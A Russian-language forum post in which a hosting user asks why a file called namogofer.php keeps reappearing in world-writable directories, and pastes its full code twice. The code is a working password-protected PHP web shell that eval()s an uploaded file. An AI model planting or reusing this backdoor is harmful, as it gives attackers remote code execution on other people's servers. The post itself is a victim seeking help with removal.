snug
Новичок
Взлом постоянно прописывается файл namogofer.php
Здравствуйте. У меня на хостинге в директориях с разрешением 777 (chmod) прописывается файл namogofer.php
содержит такой код:
Удаляю, прописывает заново. В гугле никаких конкретных советов не нашёл как убрать эту гадось.
Знаю что это бэкдор. Не пойму как он прописывается. Предполагаю? что пишется из скрипта этой строкой
@fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"]))
Пароль от ftp админки менял и не входил туда специально несколько дней. Не помогло.
Как вариант можно не использовать 777, но для меня не подходит.
Кто сталкивался, подксажите откуда он берётся, и как его убрать навсегда.
Здравствуйте. У меня на хостинге в директориях с разрешением 777 (chmod) прописывается файл namogofer.php
содержит такой код:
PHP:
<?php error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t) { echo "$t\n"; };
function testdata($t) { say(md5("testdata_$t")); };
echo "<pre>";
testdata('start');
if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3")
{ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"]))
{ eval($code); }
else{ testdata('f'); }; }
else{ testdata('pass'); }; testdata('end');
echo "</pre>"; ?>
Знаю что это бэкдор. Не пойму как он прописывается. Предполагаю? что пишется из скрипта этой строкой
@fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"]))
Пароль от ftp админки менял и не входил туда специально несколько дней. Не помогло.
Как вариант можно не использовать 777, но для меня не подходит.
Кто сталкивался, подксажите откуда он берётся, и как его убрать навсегда.